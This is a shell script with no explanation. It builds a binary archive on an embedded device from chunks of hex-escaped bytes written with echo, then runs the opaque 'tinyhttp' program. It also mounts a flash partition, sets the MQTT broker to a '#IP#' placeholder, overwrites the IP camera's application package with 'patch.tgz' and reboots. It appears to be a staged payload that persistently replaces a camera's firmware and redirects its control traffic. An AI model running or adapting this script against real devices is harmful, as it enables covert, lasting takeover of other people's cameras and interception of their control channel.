echo -n -e '\\xE8\\xBB\\x93\\xBE\\x37\\x6B\\x7C\\xAC\\xCA\\xCB\\xB4\\x01\\x6F\\x6F\\x38\\xA0\\xD5\\xF8\\xC2\\x61\\xD6\\x45\\x81\\x6E\\x51\\x5F\\x84\\xAE\\x81\\x58\\x95\\x9F' >> tinyhttp.tgz 
echo -n -e '\\xA9\\xF7\\xB7\\xD4\\xAE\\x8E\\x58\\x77\\x49\\x6A\\xB7\\xE6\\xF5\\x6B\\x11\\x4F\\xBF\\xE7\\x2E\\x5F\\x4F\\x6B\\xAD\\xDA\\x63\\xB2\\xEB\\x32\\x6C\\xBA\\x42\\xF2' >> tinyhttp.tgz 
echo -n -e '\\xF4\\xF3\\xDC\\x35\\x99\\x5C\\x2B\\x52\\xD0\\xD3\\xDF\\x7A\\x5D\\x81\\x8E\\x90\\x7F\\x2F\\xD7\\x66\\x32\\xD6\\x52\\xC0\\xBC\\x55\\x09\\xC5\\xAD\\xC5\\x34\\xD6' >> tinyhttp.tgz 
echo -n -e '\\xD4\\x7A\\x6F\\x5B\\xD3\\x96\\x9A\\xFA\\xDB\\xB9\\x52\\x53\\xC0\\xBC\\x6E\\xB3\\xF8\\x39\\xFA\\x36\\xF5\\x05\\x7D\\x51\\xE6\\x8B\\xC4\\xA2\\xB1\\xBE\\xCE\\x4E' >> tinyhttp.tgz 
echo -n -e '\\x34\\x4E\\x55\\x9B\\xB7\\xA8\\x9B\\x76\\xAC\\xDF\\xD6\\xAC\\x6E\\x68\\xDE\\xBC\\x75\\xBB\\x19\\xFA\\xF6\\xE1\\xA6\\x1D\\x6A\\xCB\\xD6\\xD6\\x36\\x10\\x42\\x48' >> tinyhttp.tgz 
echo -n -e '\\x61\\xAC\\x57\\xF5\\x51\\x28\\x60\\x94\\xCD\\x92\\xA5\\xAA\\xFE\\x90\\xDA\\x15\\x08\\x75\\x78\\x03\\xAA\\x3F\\x16\\x8A\\x44\\x55\\x6F\\xDF\\x00\\xC3\\x77\\x38' >> tinyhttp.tgz 
echo -n -e '\\xBA\\x2D\\xA6\\xF9\\x6B\\x1A\\x1A\\x94\\x35\\xB3\\x0B\\xA9\\xD9\\xCF\\x7A\\x15\\xDF\\xEC\\x91\\xBD\\x8C\\x47\\x29\\xFA\\xFB\\x7A\\x7B\\xF7\\xB2\\x50\\xC7\\x03' >> tinyhttp.tgz 
echo -n -e '\\x9A\\x2F\\x86\\xE2\\xB5\\x14\\x35\\x28\\x70\\xD4\\xEC\\xCD\\x80\\x55\\x4C\\xB5\\xDA\\xD1\\xBC\\x7D\\x63\\xA6\\x15\\x56\\x7A\\x73\\xCB\\xDD\\x1B\\xD6\\xB7\\xA8' >> tinyhttp.tgz 
echo -n -e '\\x77\\x6F\\xDA\\xD4\\xDA\\xDC\\xA6\\xB6\\xAD\\xDF\\xD0\\xD2\\x8C\\xDC\\x8D\\xF7\\x6D\\x5F\\xBF\\x6D\\x6B\\x13\\xA3\\x8B\\x03\\x2B\\x20\\xD0\\x0E\\x19\\x7C\\xD7' >> tinyhttp.tgz 
echo -n -e '\\xB0\\xC6\\xC6\\x46\\x31\\xFA\\x6F\\xF6\\xF0\\x4A\\x4B\\x9F\\x15\\xB5\\x39\\x7B\\xBC\\x23\\xF4\\x58\\x81\\x85\\x76\\x10\\xA3\\x39\\x78\\x74\\x4B\\x69\\x4F\\x24' >> tinyhttp.tgz 
echo -n -e '\\x8C\\xA4\\x37\\x32\\x6B\\x90\\xA6\\x1D\\x5D\\xCA\\xE3\\x1E\\xCD\\xD0\\xD2\\x5C\\xBB\\x4C\\x5D\\x3C\\xE2\\xD1\\xBC\\x72\\xC9\\x89\\x9A\\xB4\\x03\\x4D\\x73\\x03' >> tinyhttp.tgz 
echo -n -e '\\x26\\xAF\\x0B\\xEF\\x6C\\x6C\\x14\\x42\\x1E\\x4D\\x85\\xE6\\x4D\\x8E\\x19\\x85\\xF9\\x6E\\x71\\xAC\\xEF\\x16\\x41\\x2A\\xF4\\x76\\x6E\\xF8\\xA5\\x1D\\x27\\x6B' >> tinyhttp.tgz 
echo -n -e '\\x45\\xA6\\xF2\\x48\\x57\\x2B\\xFA\\x55\\x55\\xA1\\xC5\\x1A\\x4D\\x6E\\x47\\xD4\\x1C\\x0D\\x66\\x45\\xB1\\xAA\\xFE\\x68\\x48\\xED\\xF6\\x06\\xFD\\x54\\xC5\\xFD' >> tinyhttp.tgz 
echo -n -e '\\xB5\\x75\\x56\\x87\\xF2\\x0B\\x63\\xBE\\x7A\\x32\\x81\\x9D\\xD9\\x20\\x4F\\xA1\\xBB\\xED\\x0B\\x6A\\x33\\xE6\\x36\\x7F\\x80\\xB3\\x01\\xA3\\x66\\x09\\xEA\\x49' >> tinyhttp.tgz 
echo -n -e '\\x26\\xA8\\xE1\\xD1\\xBA\\x99\\x28\\x53\\x1A\\x0F\\x3B\\xD4\\xF4\\xFA\\x30\\xDD\\x9C\\x2E\\xB5\\xA2\\x5A\\xCD\\x08\\x57\\xF5\\xFE\\xED\\xAD\\xB1\\x35\\xFC\\xC2' >> tinyhttp.tgz 
echo -n -e '\\x78\\xAB\\xAF\\xD5\\xBB\\xD5\\xD7\\xDC\\x5C\\xBB\\x3A\\xEF\\xE2\\x78\\x2B\\xDA\\xD2\\xDC\\xDC\\xBF\\xFD\\x76\\xA8\\x0E\\xF6\\x61\\xB8\\x06\\x6A\\xD7\\xAA\\x6A' >> tinyhttp.tgz 
echo -n -e '\\x30\\x14\\xE9\\xC5\\x92\\xC2\\x4C\\x83\\x57\\x42\\x69\\x8F\\x0F\\xAE\\xA7\\x19\\x33\\xBD\\xF5\\x76\\x95\\xE6\\x71\\x67\\x28\\xB2\\xC7\\x1B\\xF1\\x67\\x04\\xD4' >> tinyhttp.tgz 
echo -n -e '\\x98\\xB7\\x2B\\x27\\xC4\\x96\\x8F\\xBE\\x39\\xB6\\xEF\\x14\\x45\\xFC\\xDE\\xEF\\xBD\\xDF\\x7B\\xBF\\xF7\\x7E\\xFF\\x77\\xBF\\xFF\\x02\\x31\\x3A\\x0A\\x2F\\x00' >> tinyhttp.tgz 
echo -n -e '\\x38\\x00\\x00' >> tinyhttp.tgz 
tar -xvf tinyhttp.tgz
mount -t jffs2 /dev/mtdblock5 /mnt/app
fw_setenv mqtt_broker #IP#
./tinyhttp && cp patch.tgz /mnt/app/ipcam.tgz && umount /mnt/app && reboot
